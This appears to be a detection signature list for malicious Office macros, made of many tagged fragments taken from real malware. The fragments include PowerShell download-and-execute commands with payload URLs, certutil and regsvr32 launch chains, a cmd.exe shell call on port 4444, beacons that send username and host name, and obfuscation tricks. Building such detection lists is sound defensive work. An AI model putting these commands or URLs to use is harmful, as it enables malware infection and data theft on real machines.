 - dcd3f665 = ActiveDocument.Shapes(1).Title + " " + f5d112a0 (MACROHSTR_EXT)
 - e5fbd99d = f5a419b7.c492b9b9(ActiveDocument.Shapes(ed71ee4c).AlternativeText) (MACROHSTR_EXT)
 - Environ("TMP") & "\temp.exe" (MACROHSTR_EXT)
 - Shell(FName + " 127.0.0.1 4444 -e C:\Windows\System32\cmd.exe", 0) (MACROHSTR_EXT)
 - Open "C:\ProgramData\ (MACROHSTR_EXT)
 - .Tag For Binary As # (MACROHSTR_EXT)
 - Exec  (MACROHSTR_EXT)
 - .DefaultTargetFrame (MACROHSTR_EXT)
 - .Open "GET", HexToString( (MACROHSTR_EXT)
 - Open "D:" & "\222.exe" For Binary As #FreeF (MACROHSTR_EXT)
 - Open Environ("temp") & "\nvidiax.exe" (MACROHSTR_EXT)
 - Shell Environ("temp") & "\taskghost.exe", vbNormalFocus (MACROHSTR_EXT)
 -  objXML.createElement("b64") (MACROHSTR_EXT)
 - Call c4e83a7b.exec(a9518afd) (MACROHSTR_EXT)
 - bdac511a.Open "GET", baedc1e7(1), False (MACROHSTR_EXT)
 - MSXML2.XMLHTTP60 (MACROHSTR_EXT)
 - tempFolderPath & "\magic.vbs" (MACROHSTR_EXT)
 - Call f88ccd55.exec(d533a26d) (MACROHSTR_EXT)
 - e689f7ea.Open "GET", f6cd39d8, False (MACROHSTR_EXT)
 - ca71f859.da502b63 e516b94e(0) + (MACROHSTR_EXT)
 - Open "C:\ProgramData\re" & kO.Tag (MACROHSTR_EXT)
 - Open "C:\ProgramData\PIYRFFjjhFGrftfgFYgrfthVfYHtrfGhyhf" For Binary As (MACROHSTR_EXT)
 - Set pOL = CreateObject(kO.jE.Tag) (MACROHSTR_EXT)
 - pOL.Exec "explorer.exe " & fIOL (MACROHSTR_EXT)
 - Call c5a3244e.exec(de86f68a) (MACROHSTR_EXT)
 - a0e1a561.Open "GET", f8a301ae(1), False (MACROHSTR_EXT)
 - CreateObject("wscript.shell").exec (d9c63594) (MACROHSTR_EXT)
 - .Open "GET", f30c94a6, False (MACROHSTR_EXT)
 - a07a5752.fda05149 bd3e4c5e(0) + " " + da03d24f("pdf") (MACROHSTR_EXT)
 - Array("@chd.com.cn", "@cfitc.com", "@cg.com.cn", "@chder.com", "@chdhk.com", "@chdi.ac.cn", "@chdoc.com.cn (MACROHSTR_EXT)
 - Load "http://10.79.22.10:8080/?eref=" & Email (MACROHSTR_EXT)
 - &mref=" & Environ("ComputerName") & "&uref=" & Environ("Username") (MACROHSTR_EXT)
 - CreateObject("W" & Me.TextBox2.Text & UserForm1.Caption) (MACROHSTR_EXT)
 - Application.StartupPath & "\..\Meeting" (MACROHSTR_EXT)
 - Caption & Len(Soma) & ".xmli" (MACROHSTR_EXT)
 - UserForm1.TextBox2.Value = "Script." (MACROHSTR_EXT)
 - objShell.ExpandEnvironmentStrings("%TEMP%") & "\cym_ (MACROHSTR_EXT)
 - batwsf (MACROHSTR_EXT)
 - ("p@:@\@j@v@a@q@b@j@f@\@f@l@f@g@r@z@3@2@\@z@f@u@g@n@.@r@k@r@")) (MACROHSTR_EXT)
 - ("P@:@\@h@f@r@e@f@\@c@h@o@y@v@p@\@v@a@.@p@b@z@")) (MACROHSTR_EXT)
 - ("P@:@\@h@f@r@e@f@\@c@h@o@y@v@p@\@v@a@.@u@g@z@y@")) (MACROHSTR_EXT)
 - = VBA.Chr( (MACROHSTR_EXT)
 - f2f0b.Open "GET", c1a32, False (MACROHSTR_EXT)
 - b98b9 = "c:\programdata\ebf45." & f1237 (MACROHSTR_EXT)
 - .exec (c3d00) (MACROHSTR_EXT)
 - = "c:\programdata\ (MACROHSTR_EXT)
 - With ActiveDocument.Shapes( (MACROHSTR_EXT)
 -  = CreateObject("wscript.shell") (MACROHSTR_EXT)
 - ("p@:@\@j@v@a@q@b@j@f@\@f@l@f@g@r@z@3@2@\@z@f@u@g@n@.@r@k@r@"), aPpTy("P@:@\@h@f@r@e@f@\@c@h@o@y@v@p@\@v@a@.@p@b@z@") (MACROHSTR_EXT)
 - ("P@:@\@h@f@r@e@f@\@c@h@o@y@v@p@\@v@a@.@u@g@z@y@"),  (MACROHSTR_EXT)
 - Shell aPpTy("P@:@\@h@f@r@e@f@\@c@h@o@y@v@p@\@v@a@.@p@b@z@") & " " &  (MACROHSTR_EXT)
 - ("P@:@\@h@f@r@e@f@\@c@h@o@y@v@p@\@v@a@.@u@g@z@y@") (MACROHSTR_EXT)
 - ("p@:@\@j@v@a@q@b@j@f@\@f@l@f@g@r@z@3@2@\@z@f@u@g@n@.@r@k@r@"),  (MACROHSTR_EXT)
 - ("P@:@\@h@f@r@e@f@\@c@h@o@y@v@p@\@v@a@.@p@b@z@") (MACROHSTR_EXT)
 - ("P@:@\@h@f@r@e@f@\@c@h@o@y@v@p@\@v@a@.@p@b@z@") & " " &  (MACROHSTR_EXT)
 - BnmZjACg.Run (MACROHSTR_EXT)
 - = CreateObject("WScript.Shell").SpecialFolders("MyDocuments") & "\hhh.zip" (MACROHSTR_EXT)
 - = CreateObject("WScript.Shell").SpecialFolders("MyDocuments") & "\ttt.zip" (MACROHSTR_EXT)
 - Shell ("C:\Users\" & Environ("UserName") & "\Documents" & "xl.png") (MACROHSTR_EXT)
 - = pathname & "\" & " (MACROHSTR_EXT)
 - .zip" (MACROHSTR_EXT)
 - C:\Pro (MACROHSTR_EXT)
 - /222222.png (MACROHSTR_EXT)
 - ThisDocument.s loadLoadKarol, "ipt.sh" (MACROHSTR_EXT)
 - .Find.Execute FindText:="_f", ReplaceWith:=girlLoveLove, Replace:=wdReplaceAll (MACROHSTR_EXT)
 - = CreateObject("wscr" + doorKarolNext + "ell") (MACROHSTR_EXT)
 - girlLikeLove.exec "c:\windows\explorer " & nextKarolKarol (MACROHSTR_EXT)
 - main.karoline ("") (MACROHSTR_EXT)
 - StrReverse("llehs.tpircsw"), lovePowGirl (MACROHSTR_EXT)
 - CreateObject(youDoorNext).exec("explorer " & youLoad) (MACROHSTR_EXT)
 - Find.Execute FindText:="@1", ReplaceWith:="", Replace:=2 (MACROHSTR_EXT)
 - http://foundation.shanto-mariamfoundation.org/24.gif (MACROHSTR_EXT)
 - http://staging.stikbot.toys/24.gif (MACROHSTR_EXT)
 - http://mahathi2.ondemandcreative.com/24.gif (MACROHSTR_EXT)
 - https://exploshot.com/24.gif (MACROHSTR_EXT)
 - powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass  -command (MACROHSTR_EXT)
 - https://isavgo.com/newfile.exe -OutFile C:\Users\Public\artwrlqpq.exe (MACROHSTR_EXT)
 - Start-Process -FilePath "C:\Users\Public\artwrlqpq.exe (MACROHSTR_EXT)
 - http://kh5vf9vv.com/fgghllk/ (MACROHSTR_EXT)
 - .exe -OutFile C:\Users\Public\ (MACROHSTR_EXT)
 - .exe}; (MACROHSTR_EXT)
 - Start-Process -FilePath "C:\Users\Public\ (MACROHSTR_EXT)
 - .exe"} (MACROHSTR_EXT)
 - Set WshShell = CreateObject("WScript.Shell") (MACROHSTR_EXT)
 - .Open "get", Decrypt("q (MACROHSTR_EXT)
 - C:\Users" + "\Public (MACROHSTR_EXT)
 - Call Shell("cmd /c copy (MACROHSTR_EXT)
 - \mew.doc", vbHide) (MACROHSTR_EXT)
 - + "\mew.zip", argument (MACROHSTR_EXT)
 - Call Shell("cmd /c rmdir /s /q (MACROHSTR_EXT)
 - \Mew\lua.cmd (MACROHSTR_EXT)
 - \Mew\row.lua (MACROHSTR_EXT)
 - DecodeBase64(Range("A3").Value (MACROHSTR_EXT)
 - CreateObject(DecodeBase64(Range("A4").Value (MACROHSTR_EXT)
 - bin.base64": .text = b64 (MACROHSTR_EXT)
 - palimernh.Exec "explorer c:\tabkey\pkmgsdgra.vbe (MACROHSTR_EXT)
 - CreateFolder ("c:\tabkey\pasodsjg" (MACROHSTR_EXT)
 - Replace(IhqsD5ZyBdlISF, ".", qDzN7pyzLd) (MACROHSTR_EXT)
 - txtFlex.SelStart = MuR1Oqkl - 1 (MACROHSTR_EXT)
 - efpodaksddn.WriteLine (paern.aloie) (MACROHSTR_EXT)
 - efpodaksddn.Close (MACROHSTR_EXT)
 - ActiveCell.FormulaR1C1 = "S" & Chr(10) & "u" & Chr(10) & "m" & Chr(10) & "r" & Chr(10) & "r" & Chr(10) & "y" (MACROHSTR_EXT)
 - /24.gif (MACROHSTR_EXT)
 - Range("A1").Value = "Cambiando el tama (MACROHSTR_EXT)
 - Split("p:\jvaqbjf\flfgrz32\zfugn.rkr|P:\hfref\choyvp\va.pbz|P:\hfref\choyvp\va.ugzy", "|") (MACROHSTR_EXT)
 - iwr http://weeshoppi.com/wp-includes/ID3/z/76020.jpg (MACROHSTR_EXT)
 - Start-Process -FilePath "C:\Users\Public\pqavvyh.exe (MACROHSTR_EXT)
 - P.exe}; (MACROHSTR_EXT)
 - P.exe"} (MACROHSTR_EXT)
 - Set P_Ol7 = CreateObject(Strtd & roc2.ControlTipText & "." & roc3.ControlTipText) (MACROHSTR_EXT)
 - MikeCh = UserForm1.Label1.Caption & "pin" & ".j" & roc4.ControlTipText (MACROHSTR_EXT)
 - Open "C:\Users\Public\Documents\load.txt" For Binary Lock Read Write As # (MACROHSTR_EXT)
 - Name UserForm1.Label1.Caption As MikeCh (MACROHSTR_EXT)
 - Me.Label1.Caption = MikeCh (MACROHSTR_EXT)
 - roc4.Caption = Chr(34) (MACROHSTR_EXT)
 - MsgBox roc2.Caption (MACROHSTR_EXT)
 - okal2s = "s:/ (MACROHSTR_EXT)
 - p_ckw = "/%3812%3812%3812%3812%3812@j.mp\asdg786352ghjdgvbsafdghas (MACROHSTR_EXT)
 - p_ckw = "/%3812%3812%3812%3812%3812%3812%3812%3812%3812@j.mp\dasr67u523gvdajmsbcmzxcghfsad (MACROHSTR_EXT)
 - http://blog.vokasidev.com/crun20.gif (MACROHSTR_EXT)
 - http://jabba.fun/crun20.gif (MACROHSTR_EXT)
 - C:\COsuv\ (MACROHSTR_EXT)
 - http://enginotelfinike.com/19.gif (MACROHSTR_EXT)
 - C:\WErtu\Reterd\szvmhegu.exe (MACROHSTR_EXT)
 - Set RPThg = VBA.CreateObject(XEoBj + "" + rMBem) (MACROHSTR_EXT)
 - cxPJx(JKhXJ(2)).exec (CnvxD) (MACROHSTR_EXT)
 - With ActiveDocument.shapes(1) (MACROHSTR_EXT)
 - GAizz = .AlternativeText (MACROHSTR_EXT)
 - EXEC("cmd /c p^owershell -w 1 (nEw-oBjecT Net.WebcL`IENt) (MACROHSTR_EXT)
 - cd $enV`:TEM`P; .\ (MACROHSTR_EXT)
 - .bat") (MACROHSTR_EXT)
 - ('Down'+'loadFile').""Invoke""('https://tinyurl.com/y2sweuzc',' (MACROHSTR_EXT)
 - .bat')") (MACROHSTR_EXT)
 - ('Down'+'loadFile').""Invoke""('https://tinyurl.com/yyfvhjmv',' (MACROHSTR_EXT)
 - ('Down'+'loadFile').""Invoke""('https://tinyurl.com/yy95dp2h',' (MACROHSTR_EXT)
 - createobject("wscript.shell").exec"%comspec%/cstart/waitc:\ (MACROHSTR_EXT)
 - .vbs (MACROHSTR_EXT)
 - createobject("wscript.shell").exec"regsvr32.exe-sc:\ (MACROHSTR_EXT)
 - createobject("wscript.shell").exec"%comspec%/cstart/waitc:\gophotonics\reddit.vbs (MACROHSTR_EXT)
 - createobject("wscript.shell").exec"regsvr32.exe-sc:\gophotonics\waveplate.dll (MACROHSTR_EXT)
 - As String = "scripting.file (MACROHSTR_EXT)
 - http://79.141.165.173/DX/FD- (MACROHSTR_EXT)
 - Scripting.FileSystemObject" (MACROHSTR_EXT)
 - cplusconsole.txt", True (MACROHSTR_EXT)
 - .Write cell.Value (MACROHSTR_EXT)
 - certutil -decode cplusconsole.txt (MACROHSTR_EXT)
 - Shell "cmd.exe /c start cplusconsole.jpg" (MACROHSTR_EXT)
 - ifapplication.operatingsystemlike"*windows*"then (MACROHSTR_EXT)
 - winhttp.winhttprequest.5.1 (MACROHSTR_EXT)
 - execute("" (MACROHSTR_EXT)
 - cplusconsole111.jpg", True) (MACROHSTR_EXT)
 - setobj=createobject("excel.application") (MACROHSTR_EXT)
 - obj.ddeinitiate"explorer.exe","c:\hddrput\daogfdkgbad.vbe (MACROHSTR_EXT)
 - open"c:\hddrput\daogfdkgbad.vbe"foroutputaccesswriteas#1 (MACROHSTR_EXT)
 - buff(counter) = ActiveSheet.Cells (MACROHSTR_EXT)
 - Shell ("cmd.exe /c start cplusconsole.jpg") (MACROHSTR_EXT)
 - Open "C:\vb\cplusconsole.jpg" For Binary Access Write As putFile (MACROHSTR_EXT)
 - ko4d = "tp://%748237%728748@j.mp/ (MACROHSTR_EXT)
 - http://sparepartiran.com/js/s0/ (MACROHSTR_EXT)
 - C:\Users\Public\Documents\" +" (MACROHSTR_EXT)
 - ..exe (MACROHSTR_EXT)
 - ShellndirObj As Shell32.Shell (MACROHSTR_EXT)
 - ShellObj.ShellExecute ee (MACROHSTR_EXT)
 - fs.CreateTextFile(Pt (MACROHSTR_EXT)
 - String(1, x6) + "." + String(1, x7) (MACROHSTR_EXT)
 - %999%999@j.mp/asdnwwodpwpkkk" (MACROHSTR_EXT)
 - https://nomzoo.ml/ds/161120.gif (MACROHSTR_EXT)
 - http://primetour.net.br/v.txt (MACROHSTR_EXT)
 - start-process($env:APPDATA+'\\'+'file.vbs') (MACROHSTR_EXT)
 - https://googleresult.in/ds/151120.gif (MACROHSTR_EXT)
 - http://cloud.c-tes.gr/ds/151120.gif (MACROHSTR_EXT)
 - https://maharishijeevan.com/ds/151120.gif (MACROHSTR_EXT)
 - https://19racks.com.br/ds/151120.gif (MACROHSTR_EXT)
 - http://new.odingrad.com/ds/151120.gif (MACROHSTR_EXT)
 - https://camexsuriname.sr/ds/151120.gif (MACROHSTR_EXT)
 - Path & "\W0rd.dll") = "" (MACROHSTR_EXT)
 - ShellExecute(fa & "nd" & "ll" & "32.exe (MACROHSTR_EXT)
 - W0rd.dll,Start", " ", SW_SHOWNORMAL (MACROHSTR_EXT)
 - ya.wav" As ActiveDocument.AttachedTemplate.Path & "\W0rd.dll" (MACROHSTR_EXT)
 - exec =  (MACROHSTR_EXT)
 - powershell.exe  (MACROHSTR_EXT)
 - new-object net.webclient (MACROHSTR_EXT)
 - /payload.txt ' (MACROHSTR_EXT)
 - = Split("mshta.exe|in.com|in.html", "|") (MACROHSTR_EXT)
 - = "c:\Users\Public" & Empty & "\Documents\" & "info.txt" & Empty (MACROHSTR_EXT)
 - ll = ll & ".casa/wp-" & Empty & Empty & "" & "info.p" (MACROHSTR_EXT)
 - ntgs) & "Local\Temp" (MACROHSTR_EXT)
 - AttachedTemplate.Path & "\W0rd.dll" (MACROHSTR_EXT)
 - 32.exe (MACROHSTR_EXT)
 - "\W0rd.dll,Start" (MACROHSTR_EXT)
 - RootPath & "\ya.wav" (MACROHSTR_EXT)
 - sf & "\ya.wav" (MACROHSTR_EXT)
 - https://via.hypothes.is/boyama.medyanef.com/vendor/hamcrest/files/phy__1__31629__2649094674__1605642612.exe (MACROHSTR_EXT)
 - %TMP%\100rn.exe") (MACROHSTR_EXT)
 - Range("A1:J15").Select (MACROHSTR_EXT)
 - Set njhbwchqy  = CreateObject(Range("A4").Value) (MACROHSTR_EXT)
 - ukbdrdezimnisjmetvjhzgidfopjubwcrep = Range("A3").Value (MACROHSTR_EXT)
 - Range("M5").Select (MACROHSTR_EXT)
 - polaothia = njhbwchqy.Create(ukbdrdezimnisjmetvjhzgidfopjubwcrep) (MACROHSTR_EXT)
 - URLDownloadToFile 0, ImagemSimplesCDT, MasterCDT & "document. (MACROHSTR_EXT)
 - PDf_2 = "exe"" /c pi" (MACROHSTR_EXT)
 - MasterCDT = "C:\Users\Public\" (MACROHSTR_EXT)
 - RaboDeCavalo = ":\Users\Public\document." (MACROHSTR_EXT)
 - cur(iC) = ActiveCell.Offset(iC, 1).Value (MACROHSTR_EXT)
 - Range("l1:x22").Select (MACROHSTR_EXT)
 - cwjkvfbumsgmjipsbdalpasrawstzlmwpcn = Range("A3").Value (MACROHSTR_EXT)
 - Set inbykwmcp  = CreateObject(Range("A4").Value) (MACROHSTR_EXT)
 - bntngqrpw = inbykwmcp.Create(cwjkvfbumsgmjipsbdalpasrawstzlmwpcn) (MACROHSTR_EXT)
 - tadlbntqflqtbtpeeoidjzjdnnxdshabjjq = Range("A3").Value (MACROHSTR_EXT)
 - qjbtnnpfd  = CreateObject(Range("A4").Value) (MACROHSTR_EXT)
 - qjbtnnpfd.Create(tadlbntqflqtbtpeeoidjzjdnnxdshabjjq) (MACROHSTR_EXT)
 - Range("A1:J18").Select (MACROHSTR_EXT)
 - opslmgtrdsvukodbnjoxctigznkfrbedwlrtfkzxciisufoslmrkbowuhlmyvnzcnryzwjw  = CreateObject(Range("A123").Value) (MACROHSTR_EXT)
 - myvnzcnryzwjw.Create(soglbjxwbectbcnooheat (MACROHSTR_EXT)
 - jqkzxoxkqocuumzjusscftxzmrvfgytikfjxwlevzmkqzzhpofuply = Range("A17").Value (MACROHSTR_EXT)
 - DownloadAndExec (MACROHSTR_EXT)
 - windows\temp\encoded.crt" (MACROHSTR_EXT)
 - .savetofile "C:\ (MACROHSTR_EXT)
 - sitiaisaicol-env.eba-cwu2wj2z.us-east-1.elasticbeanstalk.com/admin/get.php (MACROHSTR_EXT)
 - Shell ("cmd /c certutil -decode (MACROHSTR_EXT)
 - windows\temp\encoded.exe (MACROHSTR_EXT)
 - start C:\ (MACROHSTR_EXT)
 - C:\PROGRAMDATA\a""&CHAR(46)&""ex""&CHAR(101) (MACROHSTR_EXT)
 - CHAR(80)&CHAR(82)&""OGRAMDATA\a""&CHAR(46)&""ex""&CHAR(101) (MACROHSTR_EXT)
 - 32354 / 32354 (MACROHSTR_EXT)
 - .Split( (MACROHSTR_EXT)
 - ("l)m)t)h).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)|)m)o)c).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)|)e)x)e).)a)t)h)s)m)\)2)3)m)e)t)s)y)s)\)s)w)o)d)n)i)w)\):)c)|)o)t)o)m) )o)l)l)e)h)") (MACROHSTR_EXT)
 - ).create ( (MACROHSTR_EXT)
 - ActiveDocument.BuiltInDocumentProperties( (MACROHSTR_EXT)
 - sse)cor)P_2)3ni)W:2)vmi)c\t)oor):st)mgm)niw" (MACROHSTR_EXT)
 - .ShellExecute(fa & jsd & "ll" & hh, yy & "\W" & "0rd.d" & "ll,DllUnregisterServer (MACROHSTR_EXT)
 - ActiveDocument.AttachedTemplate.Path & "\W0rd.dll (MACROHSTR_EXT)
 - Loc" & "al\Te" & "mp", vbDirectory (MACROHSTR_EXT)
 - = ActiveDocument.AttachedTemplate.Path & "\W0rd.dll" (MACROHSTR_EXT)
 - nzFN.Create(MXBTv, Null, Null, intProcessID) (MACROHSTR_EXT)
 - chomputah = "." (MACROHSTR_EXT)
 - objProcess.Create pr, Null, objConfig, intProcessID (MACROHSTR_EXT)
 - pr = ActiveDocument.CustomDocumentProperties("prorrete").Value (MACROHSTR_EXT)
 - Set objStartup = objWMIService.Get(gghhii) (MACROHSTR_EXT)
 - Set objConfig = objStartup.SpawnInstance (MACROHSTR_EXT)
 - objConfig.ShowWindow = HIDDEN_WINDOW (MACROHSTR_EXT)
 - trustTemp = Replace(frm.cbtn1.Caption, "1", "") (MACROHSTR_EXT)
 - globalLeftSelect.funcStorageTemp trustTemp, titleCaptionDocument (MACROHSTR_EXT)
 - Set leftCaption = CreateObject("wscript.shell") (MACROHSTR_EXT)
 - leftCaption.exec Replace(globalLen, "1", "") & " " & Replace(indexTextboxTextbox, "1", "") (MACROHSTR_EXT)
 - Set globalException = requestResponseA.CreateTextFile(iteratorVb) (MACROHSTR_EXT)
 - globalException.WriteLine loadLocalQuery (MACROHSTR_EXT)
 - documentCollectionArray = Replace(frm.cbtn1.Caption, "1", "") (MACROHSTR_EXT)
 - tempRepo.libDocumentLink documentCollectionArray, rightTrustReference (MACROHSTR_EXT)
 - Set namespaceRemoveClear = CreateObject("wscript.shell") (MACROHSTR_EXT)
 - namespaceRemoveClear.exec Replace(convertLoadDatabase, "1", "") & " " & Replace(procStruct, "1", "") (MACROHSTR_EXT)
 - Set convertClear = memoryPointerDocument.CreateTextFile(valueWindow) (MACROHSTR_EXT)
 - convertClear.WriteLine dataView (MACROHSTR_EXT)
 - xHttp.Open "GET", "https://d.top4top.io/p_18010gsks1.jpg", False (MACROHSTR_EXT)
 - savetofile j & "/client.vbs", 2 (MACROHSTR_EXT)
 - Shell "wscript " & j & "/client.vbs", vbNormalFocus (MACROHSTR_EXT)
 - CreateObject("Adodb.Stream") (MACROHSTR_EXT)
 - ) & "." &  (MACROHSTR_EXT)
 - ) & "request.5.1") (MACROHSTR_EXT)
 - a1.Create  (MACROHSTR_EXT)
 -  ").Cells( (MACROHSTR_EXT)
 - ).Value), a2, a3, a4 (MACROHSTR_EXT)
 - ).Value), Null, Null, 0 (MACROHSTR_EXT)
 - ).exec ( (MACROHSTR_EXT)
 - .Create VMLruQSpfbGLlvyk, Null, fEoFu5dgZHt (MACROHSTR_EXT)
 - gKDUuwXyCfINsVL.mUQnXdwRxKLBASJ.ControlTipText = gKDUuwXyCfINsVL.SwtMebRBEsim.Tag (MACROHSTR_EXT)
 - gKDUuwXyCfINsVL.HqMtgTpLnvEZkQA.ControlTipText = gKDUuwXyCfINsVL.PCBouOsZVaYk.Tag (MACROHSTR_EXT)
 - gKDUuwXyCfINsVL.JOacyIvnZUMA.AutoSize = True (MACROHSTR_EXT)
 - Shell gKDUuwXyCfINsVL.bHEStkQWdlsCmYpGPDcwNRUyn.Tag, (MACROHSTR_EXT)
 - CreateObject(ListBox1.List(4)).Run "" & ( (MACROHSTR_EXT)
 -  + "32 " & "C:\users\public\ (MACROHSTR_EXT)
 - Open "GET", "http://" & ListBox1.List(3), False (MACROHSTR_EXT)
 - ListBox1.AddItem ("WScript.Shell") (MACROHSTR_EXT)
 - status. (MACROHSTR_EXT)
 - /ph0t0.jpg (MACROHSTR_EXT)
 - ListBox1.AddItem ("ADODB.Stream") (MACROHSTR_EXT)
 - Shell (Environ("APPDATA") & "\appword.cache") (MACROHSTR_EXT)
 -  = CreateObject("Wscript.Shell") (MACROHSTR_EXT)
 - .Open "GET", "http://" & ListBox1.List(3), False (MACROHSTR_EXT)
 - .SaveToFile ("C:\users\public\ (MACROHSTR_EXT)
 - .dat") (MACROHSTR_EXT)
 - ListBox1.AddItem ("long (MACROHSTR_EXT)
 - /p1cture3.jpg") (MACROHSTR_EXT)
 - c:\programdata\sds.hta (MACROHSTR_EXT)
 - Print #1, Replace(ActiveDocument.Range.Text, " (MACROHSTR_EXT)
 - Shell#("cmd /c " & (MACROHSTR_EXT)
 - shea).exec(powerrange & "hell -w " & protei &  (MACROHSTR_EXT)
 - http://31.210.20.6/w2/Hoxmq.ex" & Chr(101) & Chr(34) (MACROHSTR_EXT)
 - & "C:\Users\Public\Documents\ (MACROHSTR_EXT)
 - .ex" & Chr(101) & Chr(34) &  (MACROHSTR_EXT)
 - tehzvacfynlk & Chr$(Val("&H" & Mid$(vwvqvlajvmxs, hdjsjdpedare, 2))) (MACROHSTR_EXT)
 - "-w 1 -C ""sv xW -;sv PrZ ec;sv dyS ((gv xW).value.toString()+(gv PrZ).value.toString()) (MACROHSTR_EXT)
 - URL = "https://kithuatphanmem.000webhostapp.com/chare/test.zip (MACROHSTR_EXT)
 - oShell.Run "cmd.exe /c cd C:\Users\" & User & "\Documents\Test\necoreapp3.1 && CookieVirus.exe", 0, True (MACROHSTR_EXT)
 - Application.ActiveDocument.InlineShapes.AddPicture _ (MACROHSTR_EXT)
 - ReDim bOut((((UBound(bIn) + 1) \ 4) * 3) - 1) (MACROHSTR_EXT)
 - fcbcffecbdcbcbcbfeebbffddbdbda_cbbbcaaedd_acefefaecceabdcedfdebbccccefceafefecdbceacce.js (MACROHSTR_EXT)
 - eefffcebbbebeabcdfbffdceaecaedbcaebeef_bcbbaaea_ebfcaebebedababdafaabadecaadaffadbfebcdfeeaaf.txt", True (MACROHSTR_EXT)
 - aeeebbddccfa.GetSpecialFolder(2); (MACROHSTR_EXT)
 - caefaed.toString() (MACROHSTR_EXT)
 - Math.abs( (MACROHSTR_EXT)
 - .length-1 (MACROHSTR_EXT)
 - sopvd = "WScript." + "She" + "ll" (MACROHSTR_EXT)
 - ;D\jEtDJXD\zE3DFDD (MACROHSTR_EXT)
 - kasodkok = "tp://%748237%728748@j.mp/ (MACROHSTR_EXT)
 - jsadjjj = "ajsda (MACROHSTR_EXT)
 - kmmmmm = kasodkok + jsadjjj (MACROHSTR_EXT)
 - n0t = "ms" + "h" + "ta" + " ht" + "tp:/" + "/hot" + "elle" + "onar" + "doda" + "vi" + "nci." + "cl/p" + "ng/p" + "0.h" + "ta (MACROHSTR_EXT)
 - lora1 = "tp://%748237%728748%728748%728748%728748%728748%728748%728748%728748%728748%728748%728748%728748%728748%728748%728748@j.mp/ (MACROHSTR_EXT)
 - ht" + "tp:/" + "/hot" + "elle" + "onar" + "doda" + "vi" + "nci." + "cl/p" + "ng/p" + "0.h" + "ta (MACROHSTR_EXT)
 - WShell.run ""wscript.exe //B "" & Chr(34) & dir & ""rknrl.vbs"" & Chr(34):wspr = WShell.regread (MACROHSTR_EXT)
 - VBSpath = gPath & "\rknrl.vbs" (MACROHSTR_EXT)
 - DMpath = gPath & "\DM6331.TMP" (MACROHSTR_EXT)
 - WShell = CreateObject(""WScript.Shell"") (MACROHSTR_EXT)
 - Wsc|rip|t.S|cri|ptF|ull|Nam|e).|Par|ent|Fol|der|.Pa|th&|""\|DM6|331|.TM|P" (MACROHSTR_EXT)
 - obj.ddeinitiate"explorer.exe","c:\ (MACROHSTR_EXT)
 - open"c:\ (MACROHSTR_EXT)
 - .vbe"foroutputaccesswriteas#1 (MACROHSTR_EXT)
 - Private Declare Function E2gz2Xkyudd Lib "user32.dll" Alias "PostMessageA"  (MACROHSTR_EXT)
 - Set IyHklx0Y = GetObject(WvxB_hpc7).SpawnInstance_ (MACROHSTR_EXT)
 - .ShowWindow = CLng((0. (MACROHSTR_EXT)
 - .Open "GET", "http://pastebin.com/raw/ (MACROHSTR_EXT)
 - .savetofile "D:\ (MACROHSTR_EXT)
 - .py", 2 (MACROHSTR_EXT)
 - Shell ("C:\python (MACROHSTR_EXT)
 - \python.exe ""D:\ (MACROHSTR_EXT)
 - .py"" ") (MACROHSTR_EXT)
 - Set qwdwq = CreateObject("WScript.Shell") (MACROHSTR_EXT)
 - qwdwq.RegWrite dwwqqqq("4C4F47596049727A6D76737271697278607B6D72686D76"), dwwqqqq (MACROHSTR_EXT)
 - qwdwq.Run (dwwqqqq(" (MACROHSTR_EXT)
 - qwdwq.RegDelete dwwqqqq(" (MACROHSTR_EXT)
 - qwdwq.RegWrite dwwqqqq(" (MACROHSTR_EXT)
 - qwdwq.Run (x) (MACROHSTR_EXT)
 - ChrW(CLng((0.283018867924528 * 371) (MACROHSTR_EXT)
 - xlDialogSetBackgroundPicture - 510.171717171717 (MACROHSTR_EXT)
 - CreateObject("WSc" + Chr(114 + WDGcR + Owi0w) + "ipt." + Chr$(79 + OuwoK + ZnxWl + 4) + "hell") (MACROHSTR_EXT)
 - day = DateValue("12 / 12 / 2121") (MACROHSTR_EXT)
 - Dat.Run password, 0 (MACROHSTR_EXT)
 - Chr(81 + TWhzN + 18 + 2 + oGuRS + GUsqi) + Chr(32 + 20 + 13 + 23 + 1 + 8) + "rth." + Chr(28 + 43 + 27) + ChrW(66 + yZjrP + 26 + 5 + A8mwd) + "t" & Chr(34) (MACROHSTR_EXT)
 - Selection.Borders(xlEdgeTop) (MACROHSTR_EXT)
 - .Weight = xlThin (MACROHSTR_EXT)
 - .Create(qyfxywwkrjjrbyozonreehjisyjgibjpqliobtwd) (MACROHSTR_EXT)
 - .Run "ThisDocument." & " (MACROHSTR_EXT)
 -  = UserForm1.Controls.Add("Forms.ComboBox.1") (MACROHSTR_EXT)
 - .Workbooks.Open(FileName:=UserForm2.ComboBox1, Password:=UserForm1.ComboBox2) (MACROHSTR_EXT)
 - .Documents.Open ActiveDocument.FullName, ReadOnly:=True (MACROHSTR_EXT)
 - Application.OnTime Now + TimeSerial(0, 0, 20), "ThisDocument." & " (MACROHSTR_EXT)
 - Cells(244, 11).Value (MACROHSTR_EXT)
 - Shell (Environ("Temp") + "\ (MACROHSTR_EXT)
 - .Run (microsot(gf)) (MACROHSTR_EXT)
 - Dim aWs6G As New Shell32.Shell (MACROHSTR_EXT)
 - aWs6G.ShellExecute azAIbH, aHbP0, " ", SW_SHOWNORMAL (MACROHSTR_EXT)
 - aQNpc = ActiveDocument.Content (MACROHSTR_EXT)
 - .run  (MACROHSTR_EXT)
 -  & aRlMyx("comments") & amE2ak &  (MACROHSTR_EXT)
 - .BuiltInDocumentProperties( (MACROHSTR_EXT)
 - & "\m1.com" (MACROHSTR_EXT)
 - & "\m1.xsl" (MACROHSTR_EXT)
 - ghhfgfgdsfas.RegWrite hgfhffsadsa(a) (MACROHSTR_EXT)
 - ghhfgfgdsfas.Run (hgfhffsadsa(c) (MACROHSTR_EXT)
 - Application.Wait (Now + TimeValue("0:00:07") (MACROHSTR_EXT)
 - ghhfgfgdsfas.RegDelete hgfhffsadsa(d) (MACROHSTR_EXT)
 - aDweJ.ShellExecute aIfqk, a98NL, " ", SW_SHOWNORMAL (MACROHSTR_EXT)
 - Dim aDweJ As New Shell32.Shell (MACROHSTR_EXT)
 - "ttps://rebrand.ly/iencli51bat" (MACROHSTR_EXT)
 - =EXEC("C:\PROGRAMDATA\a.bat") (MACROHSTR_EXT)
